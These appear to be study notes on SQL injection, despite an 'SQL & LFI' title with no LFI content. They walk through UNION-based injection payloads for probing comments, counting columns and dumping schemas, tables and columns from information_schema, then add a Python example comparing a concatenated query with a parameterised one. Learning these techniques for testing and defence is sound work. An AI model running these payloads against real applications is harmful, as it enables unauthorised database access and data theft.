SQL & LFI
If you find a SQL injection vulnerability in an application, try UNION injection.
If the basic "admin'-- -" works, that means the query looks like
SELECT * FROM USERS WHERE FIRST_NAME = 'userinput'-- -'
so anything valid after the WHERE clause can be injected.
In the example below, we've got ID, Name, Position, Phone No, and Email data.
Try admin' UNION SELECT NULL,NULL,.... -- - and watch for any odd behavior (broken data, byte changes in the response) with Burp,
or try admin' ORDER BY 1, ORDER BY 2, ...
If it breaks, the query can only handle the number before the error, which is the column count.
Now we can extract useful data from the database!
Try database()
information_schema.tables
Extract data from columns and tables:
UNION SELECT SCHEMA_NAME,2,3,4,5,6 FROM information_schema.schemata -- -
If you can't extract multiple rows at once, try
' UNION SELECT group_concat(SCHEMA_NAME),2,3,4,5,6 FROM information_schema.schemata-- -
What tables are in the user database?
Once we know the table names, try to extract data from the columns.
Displaying table and column names
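
The defensive side of the probes above, as an added example that is not part of the original notes: the same FIRST_NAME lookup built by string concatenation and with a bound parameter. SQLite stands in for the MySQL backend the notes assume, and the table contents and function names are constructed for illustration.

```python
import sqlite3

def make_db():
    """In-memory database with the five columns the notes mention (constructed rows)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER, first_name TEXT, position TEXT, "
               "phone TEXT, email TEXT)")
    db.executemany("INSERT INTO users VALUES (?,?,?,?,?)", [
        (1, "admin", "Manager", "555-0100", "admin@example.test"),
        (2, "bob", "Clerk", "555-0101", "bob@example.test"),
    ])
    return db

def lookup_concat(db, user_input):
    """Vulnerable form: the input is pasted into the SQL text, as in the notes' query."""
    sql = "SELECT * FROM users WHERE first_name = '" + user_input + "'"
    return db.execute(sql).fetchall()

def lookup_bound(db, user_input):
    """Hardened form: the driver binds the input as a value, never as SQL text."""
    return db.execute("SELECT * FROM users WHERE first_name = ?",
                      (user_input,)).fetchall()

def compare(user_input):
    """Run both forms on a fresh database and return (concatenated, bound) results."""
    db = make_db()
    try:
        concat = lookup_concat(db, user_input)
    except sqlite3.Error as exc:
        # A query that breaks on user input is worth logging and alerting on.
        concat = f"SQL error: {exc}"
    return concat, lookup_bound(db, user_input)

if __name__ == "__main__":
    probes = [
        "admin",                                             # normal lookup
        "admin'-- -",                                        # comment probe from the notes
        "admin' UNION SELECT NULL,NULL,NULL,NULL,NULL-- -",  # matching column count
        "admin' UNION SELECT NULL,NULL-- -",                 # wrong column count
    ]
    for probe in probes:
        concat, bound = compare(probe)
        print(f"{probe!r}\n  concatenated: {concat}\n  bound:        {bound}")
```

With the bound parameter, every probe is compared as a literal name and matches no row, so neither the extra UNION row nor the column-count error ever appears.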